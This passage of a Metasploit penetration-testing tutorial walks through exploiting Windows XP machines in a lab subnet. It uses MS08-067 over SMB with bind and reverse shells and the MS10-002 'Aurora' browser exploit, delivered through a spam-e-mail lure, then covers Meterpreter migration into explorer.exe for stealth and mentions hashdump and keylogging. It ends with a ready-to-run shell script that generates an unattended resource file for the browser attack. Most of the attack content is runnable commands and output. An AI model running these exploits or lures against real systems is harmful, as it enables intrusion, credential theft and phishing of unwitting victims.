   127  windows/upexec/reverse_tcp_allports                                  normal  No     Windows Upload/Execute, Reverse All-Port TCP Stager
   128  windows/upexec/reverse_tcp_dns                                       normal  No     Windows Upload/Execute, Reverse TCP Stager (DNS)
   129  windows/upexec/reverse_tcp_uuid                                      normal  No     Windows Upload/Execute, Reverse TCP Stager with UUID Support
   130  windows/upexec/reverse_udp                                           normal  No     Windows Upload/Execute, Reverse UDP Stager with UUID Support
   131  windows/vncinject/bind_hidden_ipknock_tcp                            normal  No     VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
   132  windows/vncinject/bind_hidden_tcp                                    normal  No     VNC Server (Reflective Injection), Hidden Bind TCP Stager
   133  windows/vncinject/bind_ipv6_tcp                                      normal  No     VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   134  windows/vncinject/bind_ipv6_tcp_uuid                                 normal  No     VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   135  windows/vncinject/bind_named_pipe                                    normal  No     VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
   136  windows/vncinject/bind_nonx_tcp                                      normal  No     VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   137  windows/vncinject/bind_tcp                                           normal  No     VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
   138  windows/vncinject/bind_tcp_uuid                                      normal  No     VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   139  windows/vncinject/reverse_hop_http                                   normal  No     VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   140  windows/vncinject/reverse_ipv6_tcp                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   141  windows/vncinject/reverse_nonx_tcp                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   142  windows/vncinject/reverse_ord_tcp                                    normal  No     VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   143  windows/vncinject/reverse_tcp                                        normal  No     VNC Server (Reflective Injection), Reverse TCP Stager
   144  windows/vncinject/reverse_tcp_allports                               normal  No     VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   145  windows/vncinject/reverse_tcp_dns                                    normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   146  windows/vncinject/reverse_tcp_uuid                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support

msf6 exploit(windows/smb/ms08_067_netapi) > 
In typical gratuitous Metasploit style, several payloads provide a Windows command shell. Some open a listener on the target host ("bind"), some make the target "phone home" to the attacking workstation ("reverse"), some use IPv6, some carry the whole shell in a single blob ("inline", e.g. windows/shell_bind_tcp), while others first send a small stager that fetches the larger stage in further round trips ("staged", e.g. windows/shell/bind_tcp, note the extra slash). One even lets you give the attacker's address as a DNS name rather than an IP (reverse_tcp_dns). This Windows XP target virtual machine does not have a firewall enabled, so we'll use the simple windows/shell/bind_tcp payload:

msf6 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.43.240   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.43.240   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf6 exploit( windows/smb/ms08_067_netapi ) > 
8. If the target were running a firewall, we might instead choose a payload that makes the compromised workstation connect back to the attacker ("reverse").

With a bind payload, the exploit opens a listener on the target on TCP port 4444, and Metasploit then connects to that port to hand us the command shell. Let's attempt the exploit:

msf6 exploit(windows/smb/ms08_067_netapi) > exploit

9. It worked! We can verify the connection by running netstat on the Windows XP console and looking for an ESTABLISHED connection on local port 4444 (-a includes listening sockets, -n keeps addresses and ports numeric):

C:\WINDOWS\system32>netstat -an


10. Referring back to the Metasploit output, the exploit attempt originated from 192.168.43.60:35669, matching the foreign address we see in netstat. Let's try a different payload. Press CTRL-Z to put this session into the background:

C:\WINDOWS\system32>^z
Background session 1? [y/N] y
msf6  exploit( windows/smb/ms08-067_netapi ) >
11. Now set the payload to windows/shell/reverse_tcp, the reverse shell that we discovered:

msf6 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show options

12. This payload requires an additional option, LHOST: the victim needs to know which host to connect back to when the exploit succeeds. Make sure LHOST is the attacker's address (192.168.43.71 here; use set LHOST <address> if it is not), then run exploit again.

Notice that the new shell is "session 2." Press CTRL-Z to put this session in the background and return to the Metasploit prompt. Then issue the sessions command to list all active sessions:

13. It's easy to bounce back and forth between these two sessions. Just use sessions -i <session>. If you don't get a prompt immediately, try pressing ENTER.

msf6 exploit(windows/smb/ms08_067_netapi) > sessions

msf6 exploit(windows/smb/ms08_067_netapi) > sessions -i 1

You now know the most important Metasploit console commands and understand the basic exploit-launching process. Next, we'll explore other ways to use Metasploit in the penetration testing process.


Exploiting Client-Side Vulnerabilities with Metasploit

A Windows XP workstation missing the MS08-067 security update, reachable on the local subnet with no firewall protection, is not common. The main purpose of this section is to preview client-side vulnerabilities.

Have you ever received this kind of e-mail (see the screenshot)? If so, by the end of this article you will see how a machine can be compromised through nothing more than its web browser.

Client-side vulnerabilities are vulnerabilities in client software such as web browsers, e-mail applications, and media players.

The idea is to lure a victim to a malicious website or to trick him into opening a malicious file or e-mail. When the victim interacts with attacker-controlled content, the attacker presents data that triggers a vulnerability in the client-side application parsing the content. One nice thing (from an attacker’s point of view) is that connections are initiated by the victim and sail right through the firewall.

Metasploit includes many exploits for browser-based vulnerabilities and can act as a rogue web server to host them. In this example, we'll use Metasploit to host an exploit for MS10-002.
For details on the vulnerability itself, see Microsoft's security bulletin MS10-002.


Exploit Windows XP using MS10_002

1. Run Metasploit-Framework:

mrdev@kali:~$ msfconsole
2. To launch an MS10-002 exploit, we’ll first need to find the Metasploit name for this exploit. We can use the search command to do so:

msf6 > search ms10-002

Matching Modules
================

   #  Name                                        Disclosure Date  Rank    Check  Description
   -  ----                                        ---------------  ----    -----  -----------
   0  exploit/windows/browser/ms10_002_aurora     2010-01-14       normal  No     MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
   1  exploit/windows/browser/ms10_002_ie_object  2010-01-21       normal  No     MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/browser/ms10_002_ie_object

msf6 >

3. The Metasploit name for this exploit is, exploit/windows/browser/ms10_002_aurora, copy it, and use it.

msf6 > use exploit/windows/browser/ms10_002_aurora
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms10_002_aurora) >
4. Every exploit and payload has its own options. To list them, run:

msf6 exploit(windows/browser/ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.43.71    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit( windows/browser/ms10_002_aurora ) >
Metasploit's browser-based exploit modules carry additional server options:

SRVHOST: the address Metasploit's web server listens on (0.0.0.0 means every local interface)
SRVPORT: the TCP port it listens on (8080 by default)
URIPATH: the path part of the malicious URL (random by default)

5. Now run the following command to make the server listen on the attacker's own interface address:

msf6 exploit(windows/browser/ms10_002_aurora) > set SRVHOST 192.168.43.175
SRVHOST => 192.168.43.175
msf6 exploit(windows/browser/ms10_002_aurora) >
If you don't know your IP address, run ifconfig (or ip addr) on Kali:

mrdev@kali:~$ ifconfig
6. Metasploit will act as a web server, so URIPATH is the rest of the URL to which you'll be luring your victim. A good link for this kind of attack might be http://<IP ADDRESS>:8080/you_win.htm, in which case you would set URIPATH to you_win.htm:

msf6 exploit(windows/browser/ms10_002_aurora) > set URIPATH you_win.htm
URIPATH => you_win.htm
msf6 exploit(windows/browser/ms10_002_aurora) >
In the run shown below, however, URIPATH (and SRVHOST) were left at their defaults, so Metasploit listened on all interfaces and generated a random path.
7. Now run exploit:

msf6 exploit(windows/browser/ms10_002_aurora) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.43.71:4444 
msf6 exploit(windows/browser/ms10_002_aurora) > [*] Using URL: http://0.0.0.0:8080/SCHcjgf4
[*] Local IP: http://192.168.43.71:8080/SCHcjgf4
[*] Server started.

Metasploit is now waiting for incoming HTTP connections on port 8080. When a browser connects, Metasploit serves the MS10-002 exploit with a Meterpreter payload that makes Internet Explorer connect back to the handler at LHOST:LPORT, here 192.168.43.71:4444 (the "Started reverse TCP handler" line above). Give the victim the "Local IP" URL, not the 0.0.0.0 one, which is only the listen address.





Let's see what happens when a workstation missing Microsoft security update MS10-002 visits the malicious web page and clicks through the prompts.

For the lure, I sent the victim a spam-style e-mail containing the link (from a webmail site opened in my browser). When the victim finds the mail and clicks the link, Internet Explorer loads the page, the exploit fires, and a new session shows up in msfconsole:

Meterpreter is used differently from the plain command-shell payloads; the next section covers it.



Penetration Testing with Metasploit's Meterpreter

Having a command prompt is great. However, it is often convenient to have more flexibility after you've compromised a host, and in some situations you need to be so stealthy that even creating a new process on the host is too much noise. That's where the Meterpreter payload shines!

 

The Metasploit Meterpreter is a command interpreter payload that is injected into the memory of the exploited process and provides extensive, extendable features to the attacker. The payload never touches the disk on the victim host: everything is injected into process memory, and no additional process is created. It also provides a consistent feature set no matter which platform is being exploited. Meterpreter is extensible, allowing you to load new features on the fly by uploading DLLs into the target process's memory.

To introduce Meterpreter, we'll reuse the MS10-002 browser-based exploit, this time paying attention to the Meterpreter payload (windows/meterpreter/reverse_tcp, the module's default) rather than a plain command-shell payload.

The exploit worked again. Let's check our session listing with the sessions command.

We now have two command shells from the previous examples and one new Meterpreter session. Let's interact with the Meterpreter session (sessions -i <id>).

The help command will list all the built-in Meterpreter commands. The entire command list would fill several pages, but here are some of the highlights.

Let's start with the ps and migrate commands. Remember that the Meterpreter payload typically runs within the process that has been exploited (Meterpreter paired with MS10-002 is a bit of a special case), so as soon as the user closes that web browser, the session is gone. In the case of client-side exploits especially, you'll want to move Meterpreter out of the client application's process space and into a process that will be around longer. A good target is the user's explorer.exe process: explorer.exe manages the desktop and shell, so as long as the user is logged in it should remain alive. In the following example, we use the ps command to list all running processes, read the PID of explorer.exe from that list, and then run migrate <PID> to move Meterpreter into it.

Great, now our session is less likely to be terminated by a suspicious user.

When pen-testing, your goals will often be to elevate privileges, establish a stronger foothold, and expand access to other machines. In this demo, so far we have a Meterpreter session running as TS-1B7F08B5B4BA\TS. This local workstation account is better than nothing, but it won't allow us to expand access to other machines.

There are several other ways to use a Meterpreter session: you can log keystrokes, run code as a different logged-on user, or combine Meterpreter's hashdump command with Metasploit's psexec module to log in to other machines that share the same password. I cannot explore all of these here. If you want to learn more about Meterpreter, write "yes" in the comment section.

There is also msfvenom, a tool that generates stand-alone payloads (a malicious executable or application) that can be delivered to a target with no exploitable vulnerability at all; the target just has to run the file.

Due to community guidelines, I cannot teach that on YouTube. But don't worry, I already have a tutorial on using msfvenom; find it on my website, linked in the description.

Using those two videos you will learn how to build a malicious application.

If you have any doubts or queries about this video, write them below in the comment section.


Automating and Scripting Metasploit

The examples shown so far have all required a human at the keyboard to launch the exploit and, similarly, to type in each post-exploitation command. On larger penetration test engagements that would, at best, be monotonous, or worse, cause you to miss exploitation opportunities because you were not available to type the necessary commands the moment a session came in.

Thankfully, Metasploit offers functionality to automate post-exploitation and even lets you build your own scripts to run on each compromised session. Let's start by creating an automated script and running it.

A resource script is simply a text file of msfconsole commands, one per line, executed in order. Open a new terminal window and change to the directory where you want the script to live (the Desktop, in this demo). Then create the file with nano, putting in it all the commands we used to gain access to the Windows XP machine. Give the file the ".rc" extension.

To run the script from inside msfconsole, use the resource command followed by the path to the file.

As you can see, it automatically runs each command in turn. Alternatively, run it directly from a new terminal window with msfconsole -r <file>.

You can find the bundled Meterpreter scripts in your Metasploit installation under /usr/share/metasploit-framework/scripts/meterpreter. These scripts are written in Ruby.

Let me open one just to show you what is in a script.
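The resource script described above, written out as an added example: this is not the article's own script, and the lab addresses, the output path and the option names of the migrate post module (NAME, SPAWN) are assumptions to check against your own lab and against `info post/windows/manage/migrate`. The shell function writes an .rc file that replays the MS10-002 browser walkthrough unattended with a Meterpreter payload, keeps the rogue web server running as a background job, and uses the AutoRunScript option to perform the ps/migrate step from the Meterpreter section automatically on every new session, before the victim closes Internet Explorer:

```shell
#!/bin/sh
# Added example, not from the original article: generate a Metasploit
# resource script (.rc) for the MS10-002 browser exploit so that no one
# has to be at the keyboard when a victim clicks the link.
# Assumptions: lab addresses, output path, and the migrate module's
# option names (NAME, SPAWN); verify with "info post/windows/manage/migrate".

# write_rc OUTFILE LHOST [LPORT] [SRVPORT] [URIPATH]
# Writes one msfconsole command per line; lines starting with "#" are
# comments to msfconsole's resource loader.
write_rc() {
    out="$1"; lhost="$2"; lport="${3:-4444}"
    srvport="${4:-8080}"; uripath="${5:-you_win.htm}"
    cat > "$out" <<EOF
# aurora.rc: unattended version of the MS10-002 browser walkthrough
use exploit/windows/browser/ms10_002_aurora
# Listen on the attacker's own interface, not 0.0.0.0, so the printed URL is usable
set SRVHOST $lhost
set SRVPORT $srvport
set URIPATH $uripath
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
# On every new session, leave the browser process and migrate into explorer.exe
# (SPAWN=false: use the existing process instead of spawning a new one)
set AutoRunScript post/windows/manage/migrate NAME=explorer.exe SPAWN=false
# Background job (-j), no automatic interaction (-z); the server keeps serving
exploit -j -z
EOF
}

# count_commands FILE: number of non-comment, non-blank lines, a quick
# sanity check on the generated script before handing it to msfconsole.
count_commands() {
    grep -c -v -e '^#' -e '^[[:space:]]*$' "$1"
}

# Stand-alone run: write ./aurora.rc with the attacker address used in the
# walkthrough (192.168.43.71) and print the two ways to launch it.
rc="${RC_OUT:-./aurora.rc}"
write_rc "$rc" 192.168.43.71
echo "wrote $rc ($(count_commands "$rc") commands)"
echo "launch with: msfconsole -q -r $rc"
echo "or, inside msfconsole: resource $rc"
```

The lure URL becomes http://192.168.43.71:8080/you_win.htm, and each callback is migrated out of Internet Explorer without anyone typing ps and migrate by hand. Both `msfconsole -r` and the `resource` command read the same file, so the script serves the interactive and the unattended workflow alike.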


Going Further with Metasploit

There are a few other ways to exploit a device. The simplest and easiest is msfvenom.

A few other videos explore the Metasploit Framework further; watch them on my blog, linked in the description. It's time to say goodbye. If you have any doubts or queries about my videos, write them below in the comment section.
